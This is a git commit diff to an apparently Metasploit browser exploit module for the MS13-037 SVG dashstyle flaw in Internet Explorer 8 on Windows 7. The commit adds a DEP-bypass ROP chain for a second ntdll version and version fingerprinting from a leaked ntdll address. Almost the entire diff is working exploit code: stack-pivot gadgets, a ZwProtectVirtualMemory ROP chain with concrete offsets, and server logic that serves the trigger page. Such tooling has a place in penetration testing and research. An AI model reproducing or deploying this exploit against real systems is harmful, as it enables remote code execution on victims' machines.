Add DEP bypass for ntdll ms12-001

jvazquez-r7 · jvazquez-r7 · commit 5c8053491f94 · 2013-06-12T10:41:05.000-05:00
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -72,7 +72,10 @@ def initialize(info={})
 							'Offset' => '0x5f4'
 						}
 					],
-					[ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',  # requires ntdll.dll v 6.1.7601.17514
+					# requires:
+					# * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
+					# * ntdll.dll v6.1.7601.17725 (MS12-001)
+					[ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
 						{
 							'Rop' => :ntdll,
 							'Offset' => '0x5f4'
@@ -155,25 +158,9 @@ def ie_heap_spray(my_target, p)
 		return js
 	end
 
-	def get_payload(t, cli)
-		code = payload.encoded
-		# No rop. Just return the payload.
-		return code if t['Rop'].nil?
-
-		# Both ROP chains generated by mona.py - See corelan.be
-		case t['Rop']
-		when :jre
-			print_status("Using JRE ROP")
-
-			stack_pivot = [
-				0x7c348b06, # ret # from msvcr71
-				0x7c341748, # pop ebx # ret # from msvcr71
-				0x7c348b05  # xchg eax, esp # ret from msvcr71
-			].pack("V*")
-
-			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
-		when :ntdll
-			print_status("Using ntdll ROP")
+	def get_ntdll_rop
+		case @ntdll_version
+		when "6.1.7601.17514"
 			stack_pivot = [
 				@ntdll_base+0x0001578a, # ret # from ntdll
 				@ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
@@ -191,7 +178,49 @@ def get_payload(t, cli)
 				0x00000400, # NumberOfBytesToProtect
 				0x41414141  # OldAccessProtection
 			].pack("V*")
-			rop_payload = stack_pivot + ntdll_rop + payload.encoded
+			return stack_pivot + ntdll_rop
+		when "6.1.7601.17725"
+			stack_pivot = [
+				@ntdll_base+0x0001579a, # ret # from ntdll
+				@ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
+				@ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll
+			].pack("V*")
+			ntdll_rop = [
+				@ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory
+				0x0c0c0c40, # ret to shellcode
+				0xffffffff, # ProcessHandle
+				0x0c0c0c34, # ptr to BaseAddress
+				0x0c0c0c38, # ptr to NumberOfBytesToProtect
+				0x00000040, # NewAccessProtection
+				0x0c0c0c3c, # ptr to OldAccessProtection
+				0x0c0c0c40, # BaseAddress
+				0x00000400, # NumberOfBytesToProtect
+				0x41414141  # OldAccessProtection
+			].pack("V*")
+			return stack_pivot + ntdll_rop
+		else
+			return ""
+		end
+	end
+
+	def get_payload(t, cli)
+		code = payload.encoded
+		# No rop. Just return the payload.
+		return code if t['Rop'].nil?
+
+		# Both ROP chains generated by mona.py - See corelan.be
+		case t['Rop']
+		when :jre
+			print_status("Using JRE ROP")
+			stack_pivot = [
+				0x7c348b06, # ret # from msvcr71
+				0x7c341748, # pop ebx # ret # from msvcr71
+				0x7c348b05  # xchg eax, esp # ret from msvcr71
+			].pack("V*")
+			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+		when :ntdll
+			print_status("Using ntdll ROP")
+			rop_payload = get_ntdll_rop + payload.encoded
 		end
 
 		return rop_payload
@@ -380,17 +409,35 @@ def on_request_uri(cli, request)
 			rescue
 				0
 			end
-			@ntdll_base = leak - 0x470B0
-			vprint_status("ntdll leak: #{leak.to_s(16)}, ntdll base: #{@ntdll_base.to_s(16)}")
-			if ((leak != 0) && ((@ntdll_base & 0x1111) != 0))
-				print_error("ntdll version not detected, sending 404: #{agent}")
-				send_not_found(cli)
-				return
+
+			if leak == 0
+				html = load_exploit_html(my_target, cli)
+				html = html.gsub(/^\t\t/, '')
+				print_status("Sending HTML to trigger...")
+				send_response(cli, html, {'Content-Type'=>'text/html'})
 			end
+
+			vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
+			fingerprint = leak & 0x0000ffff
+
+			case fingerprint
+			when 0x70B0
+				@ntdll_version = "6.1.7601.17514"
+				@ntdll_base = leak - 0x470B0
+			when 0x7090
+				@ntdll_version = "6.1.7601.17725" # MS12-001
+				@ntdll_base = leak - 0x47090
+			else
+			print_error("ntdll version not detected, sending 404: #{agent}")
+			send_not_found(cli)
+			return
+			end
+
 			html = load_exploit_html(my_target, cli)
 			html = html.gsub(/^\t\t/, '')
 			print_status("Sending HTML to trigger...")
 			send_response(cli, html, {'Content-Type'=>'text/html'})
+
 		end
 
 	end
